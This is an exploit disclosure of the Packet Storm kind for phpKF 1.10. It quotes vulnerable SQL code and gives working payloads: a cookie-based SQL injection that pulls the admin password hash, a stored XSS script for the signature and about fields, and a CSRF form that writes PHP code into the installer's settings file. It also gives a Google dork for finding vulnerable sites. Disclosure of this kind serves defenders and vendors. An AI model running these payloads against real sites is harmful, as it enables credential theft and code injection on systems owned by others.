phpKF 1.10 XSS / CSRF / SQL Injection

2019-05-18T00:00:00
ID PACKETSTORM:152977
Type packetstorm
Reporter Ahmethan Gultekin
Modified 2019-05-18T00:00:00

Description

                                        
                                            `# Exploit Title: phpKF - Multi Vulnerabilities (XSS , SQLi , CSRF)  
# Google Dork: Yazılım: phpKF © 2007-2019  
# Date: 06.07.2018  
# Exploit Author: Ahmethan GULTEKIN ~ @inject0r16 (b4)  
# Vendor Homepage: https://www.phpkf.com/  
# Software Link: https://www.phpkf.com/indirme.php  
# Version: 1.10  
# Tested on: Windows 7-8-10 & Parrot OS  
# CVE : none  
  
  
*SQL Injection:*  
  
URL: phpkf-yonetim/phpkf-bilesenler/guvenlik.php  
  
Line : 69  
  
$vtsorgu = "SELECT  
id,yonetim_kimlik,kullanici_kimlik,yetki,son_hareket,kul_ip FROM  
$tablo_kullanicilar WHERE yonetim_kimlik='$_COOKIE[yonetim_kimlik]' AND  
kullanici_kimlik='$_COOKIE[kullanici_kimlik]' LIMIT 1";  
  
payload:  
%bf%27 UNION SELECT sifre FROM phpkfcms_kullanicilar WHERE id='1  
  
  
  
  
*XSS Injection:*  
  
URL: /uye-profil.php?kp=degistir  
  
  
*payload*: <script>alert(1)</script>  
  
*injectable area* : Imza and Hakkinda  
  
  
injected screenshot:  
https://resimag.com/p1/87f45db571d.png  
https://resimag.com/p1/a6a31f8aae8.png  
  
  
*CSRF Vuln:*  
  
This is so interested vuln. Because what you enter as a parameter, it is  
downloading as a file.  
  
*POC*:  
  
<form action = "http://{YOURHOST}/phpkf-cms/phpkf-kurulum/guncelle.php"  
method = "POST">  
<input type = "hidden" name = "kurulum_yapildi" value = "ayar_dosyasi">  
<input type = "hidden" name = "ayar_bilgi" value = "<?=phpinfo();?>">  
<input type = "submit" value = "git">  
</form>  
<span>b4style</span>  
  
  
screenshot:  
https://resimag.com/p1/30442c329ad.png  
  
#MoreThanYourImagine! - GrayCorpz Sec.  
`